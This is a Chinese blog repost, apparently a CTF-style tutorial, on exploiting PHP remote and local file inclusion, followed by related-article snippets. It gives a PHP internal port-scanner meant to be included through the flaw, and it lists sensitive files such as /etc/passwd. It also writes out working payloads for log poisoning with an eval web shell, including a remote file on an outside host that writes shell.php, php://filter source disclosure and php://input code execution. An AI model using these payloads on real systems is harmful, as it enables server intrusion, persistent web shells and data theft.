文件包含漏洞(RFI)

最新推荐文章于 2024-06-23 15:43:40 发布
最新推荐文章于 2024-06-23 15:43:40 发布
阅读量967 收藏 1
点赞数
文章标签: php shell 数据库
原文链接:http://www.cnblogs.com/hackxf/p/8933169.html
版权

1文件包含漏洞简介

include  require  include_once   require_once

RFI综述

RFI是Remote File Inclusion的英文缩写,直译过来就是远程文件包含,文件包含的目的是:程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在其他文件中包含调用代码的文件。

一下是一个扫描端口PHP,可以包含它来探测内网端口 

 

<?php
//echo "<script>alert('SCAN');</script>";
if(isset($_REQUEST['ip'])){
        $ports = array(80,8080,21,443,3306,22,1,2,1433);
        $result = array();
        foreach($ports as $port){
                if($pf = @fsockopen($_REQUEST['ip'], $port, $err, $err_string, 2)){
                        $result[$port] = true;
                        fclose($pf);
                }else{
                        $result[$port] = false;
                }
        }
        foreach($result as $port=>$val){
                $serv = @getservbyport($port, 'TCP');
                echo "scan port " . $port . " (" . $serv . "):";
                if($val){
                        //echo 'open'.'<br>';
                        echo "<span style=\"color:green\">open</span><br>";
                }else{
                        //echo 'close'.'<br>';
                        echo "<span style=\"color:red\">close</span><br>";
                }
        }
}
?>
扫描端口

 

 

 

 

1.本地文件包含漏洞

2.远程文件包含漏洞

条件:php.ini文件中的allow_url_include=On

http://test.com/?page=http://www.baidu.com/index.html

3.常见的敏感文件

 

1. 根目录下存在flag文件
 C://flag.txt
2. passwd文件存在flag
/etc/passwd
3. Web根目录下存在 flag文件
4. 当前页面下存在flag文件
5. apache/php/mysql配置文件下存在flag文件
利用phpinfo()函数来获取路径

 3重要的利用手法

(1)包含上传的getshell

                 上传图片马,利用文件包含我们的图片马,菜刀连接

(2)包含日志文件getshell

burpsuite里面访问
http://127.0.0.1/<?php eval($_POST[1]);?>
为了避免在web中进行了url编码,进行报错,把爆错信息写进日志
http://test.com/?page=../apache/logs/error.log
成功

(3)远程文件包含getshell

(4)远程文件包含写shell

包含hackxf.cn下面的get_shell.txt文件,内容

<?php
//fputs()
//fopen(filename, mode)

fputs(fopen('shell.php','w'),'<?php eval($_POST[1]);?>');

?>

访问当前目录下已经生成的shell.php文件

(5)PHP封装协议读取文件

1 php://filter/read=convert.base64-encode/resource=index.php
2 
3 http://test.com/?page=php://filter/read=convert.base64-encode/resource=index.php

(6)PHP封装协议命令执行

http://127.0.0.1/cmd.php?file=php://input

[POST DATA] <?php phpinfo()?>

(7)file封装协议读取文件

http://test.com/?page=file://c:/flag.txt

 

转载于:https://www.cnblogs.com/hackxf/p/8933169.html

diecai2192
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
什么是文件包含漏洞
m0_74013288的博客
11-05 260
文件包含漏洞File Inclusion Vulnerability)是一种web应用程序中常见的安全漏洞,它允许攻击者在应用程序中任意包含本地或远程文件。通过利用这个漏洞,攻击者可以访问并执行未授权的文件,可能导致敏感信息泄露、远程命令执行、甚至完全控制目标系统。文件包含漏洞通常存在于web应用程序中,特别是在未正确输入验证和过滤的用户提供的输入的情况下。攻击者可以通过操纵请求参数、URL路径或Cookie等输入方式来改变应用程序解析和包含文件的逻辑。
1.File Inclusion含义——小白笔记——文件包含漏洞
qwsn
11-11 1673
0x01:文件包含漏洞到底是什么? 1.网络安全: 对于我们这个行业来说,文件包含实质是文件包含漏洞 2.文件包含的英文名: File Inclusion 3.文件包含的作用: 在应用程序运行中,可以动态的引入文件的内容 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被...
文件包含漏洞File Inclusion
Ethan024的博客
04-07 320
什么是文件包含文件包含是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如将一系列功能函数都写进function.php中,之后当某个文件需要调用的时候,就直接在文件头中写上一句<?php include function.php>就可以调用函数代码。 什么是文件包含漏洞: 由于网站功能需求,会让前端用户选择需要上传的文件(或者在前端的功能中使用“包含”功能)。又由于开发人员没有对包含的这个文件进行安全考虑,就导致攻
文件包含(LFI/RFI)
猎荒者
04-18 768
“惩恶扬善,取财有道” 这八个字应该是这个时代,白帽子职业,最有尊严的生存方式。 0x00 环境准备 phpstudy sublime firefox(hackbar) 0x01 本地文件包含(LFI) 被包含的文件在服务器本地 1. 常见本地包含 ① show_1.php <?php if ($_GET['page']) { include($_GET['page']);...
[译]文件上传漏洞
iteye_16188的博客
10-12 143
原文地址:http://resources.infosecinstitute.com/file-upload-vulnerabilities/ 有两种不用的问题:一种由metadata产生的,例如路径和文件名。他们可以用于欺骗程序覆盖一个至关重要的文件或是存储在一个不好的地方。例如攻击者可以上传一个叫index.ph的恶意文件到根文件夹,通过把文件名改为../../index.php。另一个问题...
Web渗透:文件上传漏洞
最新发布
WolvenSec的博客
06-23 652
这段代码的主要功能是通过检查文件扩展名,确保用户上传的文件符合预期(["jpg","png","gif"];)的格式要求。如果文件的扩展名不在允许的列表中,用户将看到一个警告消息,并且页面会重新加载。
文件包含原理解释-require
05-13
不恰当的文件包含可能导致远程文件包含漏洞RFIRemote File Inclusion),攻击者可以通过构造恶意URL来包含远程服务器上的文件,甚至执行任意代码。因此,我们应该始终确保包含的文件路径是可信的,并避免用户...
使用SMB共享来绕过php远程文件包含的限制执行RFI的利用
10-16
在本文中,我们将深入探讨如何利用PHP远程文件包含Remote File InclusionRFI漏洞,即使在PHP环境中配置了禁止从HTTP/FTP URL包含文件的情况下。远程文件包含漏洞通常发生在应用程序允许用户输入用于决定要...
信息安全技术:远程文件包含漏洞.pptx
11-01
远程文件包含漏洞Remote File Inclusion,简称RFI)是一种常见的网络安全问题,尤其在基于PHP的Web应用程序中较为常见。这种漏洞允许攻击者通过指定远程URL来包含并执行非预期的外部文件,从而可能对系统造成严重...
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计
09-26
文件包含漏洞可以分为本地文件包含(Local File Inclusion,LFI)和远程文件包含Remote File InclusionRFI)。本地文件包含是指包含的文件在本地服务器上,而远程文件包含是指包含的文件在远程服务器上。远程...
XSS,RFI扫描者
01-28
XSS,RFI扫描者
php包含漏洞自动挖掘分析工具下载 php远程包含漏洞
11-22
PHP包含漏洞是Web应用程序安全领域中的一个重要话题,它主要涉及到PHP语言中的文件包含函数,如`include`、`require`、`include_once`和`require_once`等。这些函数允许程序动态地加载和执行PHP脚本,但如果使用不当...
11. 文件上传漏洞
enlyhua的专栏
11-03 292
<?php if ($_POST) { var_dump($_FILES['image']); $ext = pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION); if (in_array($ext, ['png', 'jpg'])) { echo '类型检测成功
Web安全之文件上传漏洞
When you collect everything, you understand nothing.
09-19 389
0x00 漏洞介绍 系统管理员都有过系统被上传后门、木马或者是网页被人篡改的经历,这类攻击大部分是通过文件上传来是实现的。文件上传漏洞是指网络攻击者上传了一个可执行文件到服务器并执行。这里上传的文件可以是木马、病毒、恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。 WebShell就是以asp、php、jsp或者cg...
RFI远程文件包含漏洞
weixin_30512089的博客
11-19 317
RFI(Remote File Inclusion) 远程文件包含漏洞,即服务器通过PHP的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严格,从而可以去包含一个恶意文件,攻击者就可以远程构造一个特定的恶意文件达到攻击目的。文件包含的目的程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在其他文件中包含调用代码的文件。PHP中常用的包含调用...
2021-7-5目录穿越ssrf配合RFI漏洞学习笔记转
qq_45290991的博客
07-05 286
目录 什么是目录遍历? 漏洞原理 实验 0x00  基础目录遍历 0x01  绝对路径 0x02  双写../绕过 0x03  URL编码绕过 0x04  绝对路径配合../ 0x05  截断文件后缀 防御   什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的...
php代码审计文件包含,PHP代码审计之远程文件包含RFI
weixin_42512509的博客
03-10 305
有位叫做普瑞斯特的大牛针对PHP的web应用列出了下面几种攻击方式:1.命令注入(CommandInjection)2.eval注入(EvalInjection)3.客户端脚本攻击(ScriptInsertion)4.跨网站脚本攻击(CrossSiteScripting,XSS)5.SQL注入攻击(SQLinjection)6.跨网站请求伪造攻击(CrossSiteRequest...
Web渗透学习-织梦CMS-RFI
Garfy's Blog
07-09 1592
今天学习了exploit-db上面的一个漏洞,是织梦CMS最新版本的RFI远程文件包含)。 织梦CMS最新版本的安装文件中仍然采用覆盖变量的方式更新系统,并且存在一些关键变量存储更新系统的路径信息,因此可以通过覆盖变量的方式来获取shell。 大致可以分为三步: 1.清空/data/config_update.php中的信息。 http://127.0.0.1/install
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
seanyang_的博客
10-26 297
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件中的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用中,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
后台管理系统文件包含漏洞测试方法描述
05-17
4. 利用漏洞:如果存在文件包含漏洞,攻击者可以利用该漏洞读取或者执行服务器上的敏感文件,包括配置文件、数据库文件等。攻击者还可以通过上传webshell等方式获取服务器的控制权。 需要注意的是,在测试时需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值